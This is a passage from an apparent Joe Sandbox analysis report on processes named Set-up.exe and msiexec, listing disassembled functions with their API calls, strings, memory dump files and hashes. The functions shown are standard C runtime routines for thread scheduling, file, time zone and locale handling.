Opcode ID: 065495b5c24037645e6d83384d115632d1ea744e8bd33c80facf9b6090989284
Instruction ID: 828bae39ab7e1f3a5181c1a786a51d676f3a204e5bdb2d8900a584d4a79d97c7
Opcode Fuzzy Hash: 065495b5c24037645e6d83384d115632d1ea744e8bd33c80facf9b6090989284
Instruction Fuzzy Hash: D751367150C7C18ED336CB2884583DABFE16BA6314F488A5DD1E94B3D2D7B44149C7A3

Function 02F1420D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 02F1425B
GetSystemMetrics.USER32 ref: 02F1426A

Strings

, xrefs: 02F1433E

Memory Dump Source

Source File: 00000008.00000002.2233612067.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.2233581533.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233674395.0000000002F23000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233709115.0000000002F26000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233741456.0000000002F38000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000008.00000002.2233771623.0000000002F3C000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ee0000_msiexec.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 366b5d66e34dd59189853a3b5259b35edaf80bad9e12dbd773891112db6be69a
Instruction ID: 008cdc712ec19b6c419fcd4d6b1a9b83965e096008faa83af31af3157ff28b0b
Opcode Fuzzy Hash: 366b5d66e34dd59189853a3b5259b35edaf80bad9e12dbd773891112db6be69a
Instruction Fuzzy Hash: 045190B0E142188FDB50EFACD981A9DBBF0FB48300F118529E499E7350D774A959CF96

Analysis Process: Set-up.exePID: 3684, Parent PID: 2580COMMON

Non-executed Functions

Function 6BB8A3DD Relevance: 98.2, APIs: 38, Strings: 18, Instructions: 204libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6BB7BFE9), ref: 6BB8A3F9
GetProcAddress.KERNEL32(00000000), ref: 6BB8A402
GetLastError.KERNEL32(?,?,?,?,6BB7BFE9), ref: 6BB8A408
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BB7BFE9), ref: 6BB8A420
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,?,?,?,6BB7BFE9), ref: 6BB8A42E
GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6BB7BFE9), ref: 6BB8A447
GetProcAddress.KERNEL32(00000000), ref: 6BB8A44A
GetLastError.KERNEL32(?,?,?,?,6BB7BFE9), ref: 6BB8A450
GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6BB7BFE9), ref: 6BB8A470
GetProcAddress.KERNEL32(00000000), ref: 6BB8A473
GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6BB7BFE9), ref: 6BB8A48D
GetProcAddress.KERNEL32(00000000), ref: 6BB8A490
GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6BB7BFE9), ref: 6BB8A4AA
GetProcAddress.KERNEL32(00000000), ref: 6BB8A4AD
GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6BB7BFE9), ref: 6BB8A4C7
GetProcAddress.KERNEL32(00000000), ref: 6BB8A4CA
GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6BB7BFE9), ref: 6BB8A4E4
GetProcAddress.KERNEL32(00000000), ref: 6BB8A4E7
GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6BB7BFE9), ref: 6BB8A505
GetProcAddress.KERNEL32(00000000), ref: 6BB8A508
GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6BB7BFE9), ref: 6BB8A526
GetProcAddress.KERNEL32(00000000), ref: 6BB8A529
GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6BB7BFE9), ref: 6BB8A547
GetProcAddress.KERNEL32(00000000), ref: 6BB8A54A
GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6BB7BFE9), ref: 6BB8A568
GetProcAddress.KERNEL32(00000000), ref: 6BB8A56B
GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6BB7BFE9), ref: 6BB8A589
GetProcAddress.KERNEL32(00000000), ref: 6BB8A58C
GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6BB7BFE9), ref: 6BB8A5AA
GetProcAddress.KERNEL32(00000000), ref: 6BB8A5AD
GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6BB7BFE9), ref: 6BB8A5CB
GetProcAddress.KERNEL32(00000000), ref: 6BB8A5CE
GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6BB7BFE9), ref: 6BB8A5EC
GetProcAddress.KERNEL32(00000000), ref: 6BB8A5EF
GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6BB7BFE9), ref: 6BB8A60D
GetProcAddress.KERNEL32(00000000), ref: 6BB8A610
GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6BB7BFE9), ref: 6BB8A62E
GetProcAddress.KERNEL32(00000000), ref: 6BB8A631

Strings

EnterUmsSchedulingMode, xrefs: 6BB8A59C
UmsThreadYield, xrefs: 6BB8A49C
ExecuteUmsThread, xrefs: 6BB8A47F
UpdateProcThreadAttribute, xrefs: 6BB8A5FF
GetNextUmsListItem, xrefs: 6BB8A4F7
QueryUmsThreadInformation, xrefs: 6BB8A518
GetUmsCompletionListEvent, xrefs: 6BB8A462
DeleteProcThreadAttributeList, xrefs: 6BB8A620
DeleteUmsCompletionList, xrefs: 6BB8A4B9
CreateUmsThreadContext, xrefs: 6BB8A57B
DequeueUmsCompletionListItems, xrefs: 6BB8A439
kernel32.dll, xrefs: 6BB8A3F3, 6BB8A3F8, 6BB8A440, 6BB8A469, 6BB8A486, 6BB8A4A3, 6BB8A4C0, 6BB8A4DD, 6BB8A4FE, 6BB8A51F, 6BB8A540, 6BB8A561, 6BB8A582, 6BB8A5A3, 6BB8A5C4, 6BB8A5E5, 6BB8A606, 6BB8A627
CreateRemoteThreadEx, xrefs: 6BB8A5BD
GetCurrentUmsThread, xrefs: 6BB8A4D6
CreateUmsCompletionList, xrefs: 6BB8A3EE
InitializeProcThreadAttributeList, xrefs: 6BB8A5DE
SetUmsThreadInformation, xrefs: 6BB8A539
DeleteUmsThreadContext, xrefs: 6BB8A55A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
API String ID: 1483908321-2643937717
Opcode ID: 7dc88413dca78960b73288a744910a7f9562e1f0861fd48c4a8cfa5f6ed7b809
Instruction ID: d95424bed180724298af0132698f863078735e5f1ba3af636c8ad05f61f9c817
Opcode Fuzzy Hash: 7dc88413dca78960b73288a744910a7f9562e1f0861fd48c4a8cfa5f6ed7b809
Instruction Fuzzy Hash: 8F5103B9A00295AFDF14AB769D59D3B3A9CFA852C0304056EA51AC31D9DF7ED402CF70

Function 6BB7BE38 Relevance: 61.6, APIs: 31, Strings: 4, Instructions: 336libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 6BB7BE5C
_memset.LIBCMT(?,00000000,00000114), ref: 6BB7BE85
GetVersionExW.KERNEL32(?), ref: 6BB7BE96
GetLastError.KERNEL32 ref: 6BB7C07B
GetLastError.KERNEL32 ref: 6BB7C082
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7C097
malloc.MSVCR100 ref: 6BB7C0B0
std::exception::exception.LIBCMT ref: 6BB7C0D2
GetLastError.KERNEL32 ref: 6BB7C0F5
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7C10A
free.MSVCR100(?), ref: 6BB7C178
GetLastError.KERNEL32 ref: 6BB7C1A4
GetLastError.KERNEL32 ref: 6BB7C1AB
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7C1BD
malloc.MSVCR100 ref: 6BB7C1D6
std::exception::exception.LIBCMT ref: 6BB7C1F8
GetLastError.KERNEL32 ref: 6BB7C21E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7C230
free.MSVCR100(?), ref: 6BB7C2BB
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB7BEAA

Part of subcall function 6BB780CA: std::exception::exception.LIBCMT(6BB7C2E6,00000114,?), ref: 6BB780DE

_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000), ref: 6BB7BEB9
GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx), ref: 6BB7BEFE
GetProcAddress.KERNEL32(00000000), ref: 6BB7BF05
GetLastError.KERNEL32 ref: 6BB7BF17
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7BF30
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB7BF4D
GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,?,6BBDFEB4,00000000), ref: 6BB7C02D
GetProcAddress.KERNEL32(00000000), ref: 6BB7C034
GetLastError.KERNEL32 ref: 6BB7C040
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7C059
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB7C2E1

Strings

kernel32.dll, xrefs: 6BB7BEF9, 6BB7C028
GetLogicalProcessorInformation, xrefs: 6BB7C023
GetLogicalProcessorInformationEx, xrefs: 6BB7BEF4
bad allocation, xrefs: 6BB7C0CA, 6BB7C1F0

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error$Concurrency::unsupported_os::unsupported_osstd::exception::exception$AddressHandleModuleProcfreemalloc$ExceptionInfoSystemThrowVersion_memset
String ID: GetLogicalProcessorInformation$GetLogicalProcessorInformationEx$bad allocation$kernel32.dll
API String ID: 1988720266-1310109495
Opcode ID: c09237ba75aab98b942170401e7f6d59f50a897bc768358cec1289eb71e3e8bc
Instruction ID: fa73923ff07f3c3e318895464b8d0ab8701d29ffc4395c59f1684d4b30a4a3f8
Opcode Fuzzy Hash: c09237ba75aab98b942170401e7f6d59f50a897bc768358cec1289eb71e3e8bc
Instruction Fuzzy Hash: 73C1ADB14182859FDB30EF66C880A6E77E4FB86790F1048BDE065A3651C77DCA46CF92

Function 6BB581A1 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT(?,6BB57D1C), ref: 6BB581E3
_getdrive.MSVCR100 ref: 6BB581FD

Part of subcall function 6BB580BC: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB580EF

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6BB58214
_wcspbrk.LIBCMT(?,./\), ref: 6BB58235

Part of subcall function 6BB58163: _errno.MSVCR100 ref: 6BB5816A
Part of subcall function 6BB58163: _errno.MSVCR100 ref: 6BB58171
Part of subcall function 6BB58163: _wfullpath.MSVCR100(?,?,?), ref: 6BB58182
Part of subcall function 6BB58163: _errno.MSVCR100 ref: 6BB5818C

_wcslen.LIBCMT(00000000), ref: 6BB58263
_errno.MSVCR100 ref: 6BB5828B
__doserrno.MSVCR100 ref: 6BB58295
__doserrno.MSVCR100 ref: 6BB67CB4
_errno.MSVCR100 ref: 6BB67CBB
_invalid_parameter_noinfo.MSVCR100 ref: 6BB67CC6
towlower.MSVCR100(00000000), ref: 6BB67CE3
GetDriveTypeW.KERNEL32(00000000), ref: 6BB67CF5
free.MSVCR100(?), ref: 6BB67D12
___loctotime64_t.LIBCMT ref: 6BB67D45
free.MSVCR100(?), ref: 6BB67D72

Part of subcall function 6BB5813D: _wcslen.LIBCMT(00000000,6BB58277), ref: 6BB58140

__wsopen_s.LIBCMT(000000FF,?,00000000,00000040,00000000), ref: 6BB67DA8
__fstat64i32.LIBCMT(000000FF,?), ref: 6BB67DCC
_close.MSVCR100(000000FF,000000FF,?), ref: 6BB67DD9
FindClose.KERNEL32(?), ref: 6BB67FAA
___wdtoxmode.LIBCMT ref: 6BB67FB7
GetLastError.KERNEL32 ref: 6BB68009
__dosmaperr.LIBCMT(00000000), ref: 6BB68010
FindClose.KERNEL32(?), ref: 6BB6801C

Strings

./\, xrefs: 6BB58229

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$Find$Close__doserrno_wcslen_wcspbrkfree$CurrentDirectoryDriveErrorFileFirstLastType___loctotime64_t___wdtoxmode__dosmaperr__fstat64i32__wsopen_s_close_getdrive_invalid_parameter_noinfo_wfullpathtowlower
String ID: ./\
API String ID: 2703246364-3176372042
Opcode ID: 451adac394df7f9c3f92e783cce6613ed7f40ddbb5bee187f2a0acce5e001622
Instruction ID: 180139260ae5b6da9d162920cf1867f11ab59df55d7397fdc037ea3abfffdb55
Opcode Fuzzy Hash: 451adac394df7f9c3f92e783cce6613ed7f40ddbb5bee187f2a0acce5e001622
Instruction Fuzzy Hash: 68C151B18046A9EEDB209F75CC44AADB7B8FF09354F0002EAE65CD2140E7799E94CF65

Function 6BB562FC Relevance: 40.8, APIs: 27, Instructions: 271stringtimeCOMMON

Download Yara Rule

APIs

_lock.MSVCR100(00000007,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB5631E

Part of subcall function 6BB40C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40C5E

__tzname.MSVCR100(6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB56327
_get_timezone.MSVCR100(?,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB56333
_get_daylight.MSVCR100(6BB5693D,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB56345
_get_dstbias.MSVCR100(00000008,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB56357
___lc_codepage_func.MSVCR100(6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB56365

Part of subcall function 6BB52214: _strlen.LIBCMT(00000000), ref: 6BB52232
Part of subcall function 6BB52214: _strlen.LIBCMT(00000000), ref: 6BB52241
Part of subcall function 6BB52214: __fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB5225D

GetTimeZoneInformation.KERNEL32(6BBE4DF0,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB563AC
WideCharToMultiByte.KERNEL32(00000000,00000000,6BBE4DF4,00000000,?,0000003F,00000000,?), ref: 6BB5642A
WideCharToMultiByte.KERNEL32(000000FF,00000000,6BBE4E48,000000FF,?,0000003F,00000000,?), ref: 6BB5645D
__timezone.MSVCR100 ref: 6BB56483
__daylight.MSVCR100 ref: 6BB5648D
__dstbias.MSVCR100 ref: 6BB56497
strcmp.MSVCR100(00000000,00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB699C9
free.MSVCR100(00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB699E2
_strlen.LIBCMT(00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB699E9
_malloc_crt.MSVCR100(00000001,00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB699F0
_strlen.LIBCMT(00000000,00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB69A06
strcpy_s.MSVCR100(00000001,00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB69A14
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB69A29
free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6BB564C0,0000002C,6BB5650A,6BB56528,00000008,6BB5693D), ref: 6BB69A2F
strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6BB69A4A
atol.MSVCR100(-00000003), ref: 6BB69A67

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__fassign__invoke_watson__timezone__tzname_get_daylight_get_dstbias_get_timezone_lock_malloc_crtatolstrcmpstrcpy_sstrncpy_s
String ID:
API String ID: 3174396702-0
Opcode ID: e5d7daddfb2ab82816772c003033b1059576dff2cb54cbd86bef79cf87390a60
Instruction ID: e782705e8ac5755359037299280d807c7cca2adcb4a9c0e9dd70358e7fed7c1e
Opcode Fuzzy Hash: e5d7daddfb2ab82816772c003033b1059576dff2cb54cbd86bef79cf87390a60
Instruction Fuzzy Hash: 5791C172C042999FDB009FB8C8819ADBBF9FF0A354B14006AE191E7251E77D9D42CB65

Function 6BB47270 Relevance: 33.8, APIs: 18, Strings: 1, Instructions: 506COMMON

Download Yara Rule

APIs

_getptd.MSVCR100(00000083,00000001,000000BC,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB47278
GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB472CC
IsValidCodePage.KERNEL32(00000000,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB4731E
IsValidLocale.KERNEL32(?,00000001,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB47331
GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB4737B
GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6BB4738F
_itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6BB473A0
_TranslateName.LIBCMT ref: 6BB717C8

Strings

Norwegian-Nynorsk, xrefs: 6BB71867

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultNamePageTranslateUser_getptd_itoa_s
String ID: Norwegian-Nynorsk
API String ID: 3958957854-461349085
Opcode ID: 38d1b9e99e57ebacd51f6046bbc67bc6e5343ff2e4e46b0759598a558defceb0
Instruction ID: 4e98cf635f9758ec83b6bcdb774f1c6b6add0bad63fe710efbd002429d40847b
Opcode Fuzzy Hash: 38d1b9e99e57ebacd51f6046bbc67bc6e5343ff2e4e46b0759598a558defceb0
Instruction Fuzzy Hash: 75F1447150CAE5AFD721CF35CC95BEA7F68EF13344B0A05EBD9904B192C258E546C3A2

Function 6BB4767A Relevance: 18.2, APIs: 12, Instructions: 160stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6BB47435
free.MSVCR100(?,?,?,00000000), ref: 6BB47456
_calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB4763F
strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6BB47659
GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB476C4
_calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB476D3
GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB476EC
free.MSVCR100(00000000), ref: 6BB706E1

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: InfoLocale$_calloc_crtfree$strncpy_s
String ID:
API String ID: 2432546303-0
Opcode ID: 121a7897112a57b3c2dd897d1bdaf6a2eea07b243c48b5806450a0a9cb6dc778
Instruction ID: c5b2293cbd4607c81b5aaba4ff3898bc72069132e286701852329a4fbf26c193
Opcode Fuzzy Hash: 121a7897112a57b3c2dd897d1bdaf6a2eea07b243c48b5806450a0a9cb6dc778
Instruction Fuzzy Hash: 8051D3719002AAAFEF209F268C41BBF3BA9FF05714F1044A5F91896144DFBAC854EF61

Function 6BB473B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6BB472F5,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB473D5
strcmp.MSVCR100(00000000,ACP,?,?,6BB472F5,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB52C1C
strcmp.MSVCR100(00000000,OCP,?,?,6BB472F5,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB7176C
GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6BB472F5,?,6BB45B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB71785

Strings

OCP, xrefs: 6BB71766
ACP, xrefs: 6BB52C16

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: InfoLocalestrcmp
String ID: ACP$OCP
API String ID: 3191669094-711371036
Opcode ID: d634b1a5f75736118aaad716746ed217b7d07a8956ae579f1ed0287c95c185aa
Instruction ID: da3222a2b79d5c781d0c5429b97333890c62cddf45dfd31c1e2314ba4604b0d5
Opcode Fuzzy Hash: d634b1a5f75736118aaad716746ed217b7d07a8956ae579f1ed0287c95c185aa
Instruction Fuzzy Hash: 6B014C71A096AABEEB20AF25DC46F9E33BCFF02358F244065E911E1080E7BCD651D765

Function 6BB4A2A7 Relevance: 12.2, APIs: 8, Instructions: 225COMMON

Download Yara Rule

APIs

wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6BB4A24E,?,?,?,?,?,?), ref: 6BB4A3A2
wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB4A24E,?,?,?,?,?,?), ref: 6BB71272
wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6BB4A24E,?,?,?,?,?,?), ref: 6BB7129B
wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB4A24E,?,?,?,?,?,?), ref: 6BB712B8
_errno.MSVCR100(?,?,?,?,?,6BB4A24E,?,?,?,?,?,?,?,?,?), ref: 6BB71321
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6BB4A24E,?,?,?,?,?,?,?,?,?), ref: 6BB7132B
_errno.MSVCR100(?,?,?,?,?,6BB4A24E,?,?,?,?,?,?,?,?,?), ref: 6BB7133C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2268458229-0
Opcode ID: c1f5240053b108a06b6e3bafab692a3026b47fb90539e20584dc0318cf0e9ea9
Instruction ID: dc842da08e59edee5c046f864f5f8c30cd811422ec0f249e01d2844736e96ebb
Opcode Fuzzy Hash: c1f5240053b108a06b6e3bafab692a3026b47fb90539e20584dc0318cf0e9ea9
Instruction Fuzzy Hash: 0A712931D046E6DBDF28AE1C885109D37A6FB9570476982BAFC74D3184F379C980ABA1

Function 6BB443A6 Relevance: 12.2, APIs: 8, Instructions: 223COMMON

Download Yara Rule

APIs

wcsncpy_s.MSVCR100(?,?,?,00000000), ref: 6BB444B2
wcsncpy_s.MSVCR100(?,?,00000000,?), ref: 6BB444D9
